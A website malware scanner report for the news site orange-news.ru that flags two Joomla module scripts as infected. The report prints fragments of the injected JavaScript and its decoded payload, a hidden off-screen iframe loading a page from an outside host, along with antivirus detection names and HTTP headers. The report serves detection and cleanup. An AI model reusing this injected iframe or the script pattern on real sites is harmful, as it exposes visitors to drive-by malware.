Malware Scanner report for orange-news.ru

Malicious/Suspicious/Total URLs checked: 2/0/15
2 pages have malicious code. See details below.
Blacklists: Found
The website is marked by Yandex as suspicious.

The website "orange-news.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=orange-news.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://orange-news.ru/

Result: The website is marked by Yandex as suspicious - visiting this web site may harm your computer.

Scanned pages/files

Request | Server response | Status
http://orange-news.ru/
200 OK
Content-Length: 38836
Content-Type: text/html
clean
http://orange-news.ru/templates/yoo_downtown/warp/libraries/jquery/jquery.js
200 OK
Content-Length: 2057
Content-Type: application/x-javascript
clean
http://orange-news.ru/media/system/js/caption.js
200 OK
Content-Length: 4024
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/warp.js
200 OK
Content-Length: 11054
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/accordionmenu.js
200 OK
Content-Length: 3596
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/dropdownmenu.js
200 OK
Content-Length: 7455
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/js/template.js
200 OK
Content-Length: 2960
Content-Type: application/x-javascript
clean
http://orange-news.ru/modules/mod_gk_news_highlighter/scripts/engine_compress.js
200 OK
Content-Length: 6837
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var uneindex = 0;
if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) {
return uneindex;
}
return false;
}
function view_user(){
var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch
... 3166 bytes are skipped ...
;if(d['animationType']==2||d['animationType']==3||d['animationType']==6||d['animationType']==7){q[j]=new Fx.Style(a,'top',{duration:d['animationSpeed'],transition:d['animationFun']})}else if(d['animationType']==4||d['animationType']==5){q[j]=new Fx.Style(a,'left',{duration:d['animationSpeed'],transition:d['animationFun']})}if(j!=0)p[j].hide();if(d['animationType']>1)q[j].set(0)});if(d['mouseover']){o.addEvent("mouseenter",function(){s=true});o.addEvent("mouseleave",function(){s=false})}}})});

Decoded script:


<iframe src="http://parter.softwarefinesse.com/hdfshtrdrudtfjd19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTZ [Trj]

http://orange-news.ru/modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=300&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1
200 OK
Content-Length: 240
Content-Type: text/javascript
clean
http://orange-news.ru/modules/mod_news_pro_gk4/interface/scripts/engine.js
200 OK
Content-Length: 10850
Content-Type: application/x-javascript
clean
http://orange-news.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js
200 OK
Content-Length: 4693
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var uneindex = 0;
if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) {
return uneindex;
}
return false;
}
function view_user(){
var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch
... 3640 bytes are skipped ...
{var r=new Fx.Scroll($E('.gk_npro_short_scroll1',e),{duration:h['animation_speed'],wheelStops:false});var s=$ES('.gk_npro_short_ulwrap',e);var t=$E('.gk_npro_short_scroll1',e).getSize().size.x;var u=0;if($E('.gk_npro_short_prev',e)){$E('.gk_npro_short_prev',e).addEvent("click",function(){if(u==0){r.scrollTo((s.length-1)*t,0);u=s.length-1}else{u--;r.scrollTo(u*t,0)}});$E('.gk_npro_short_next',e).addEvent("click",function(){if(u==s.length-1){r.scrollTo(0,0);u=0}else{u++;r.scrollTo(u*t,0)}})}}})});

Decoded script:


<iframe src="http://parter.softwarefinesse.com/hdfshtrdrudtfjd19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTZ [Trj]

http://orange-news.ru/templates/yoo_downtown/warp/js/search.js
200 OK
Content-Length: 6171
Content-Type: application/x-javascript
clean
http://userapi.com/js/api/openapi.js?1
200 OK
Content-Length: 64013
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21244
Content-Type: text/javascript
clean
http://orange-news.ru//mc.yandex.ru/metrika/watch.js/
404 Компонент не найден
Content-Length: 938
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: orange-news.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 20:43:55 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 20:43:55 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dec41ec1f2095033a7830ab20e55d83d=59r0gfk9i1p476tancsct63037; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: orange-news.ru
Referer: http://www.google.com/search?q=orange-news.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.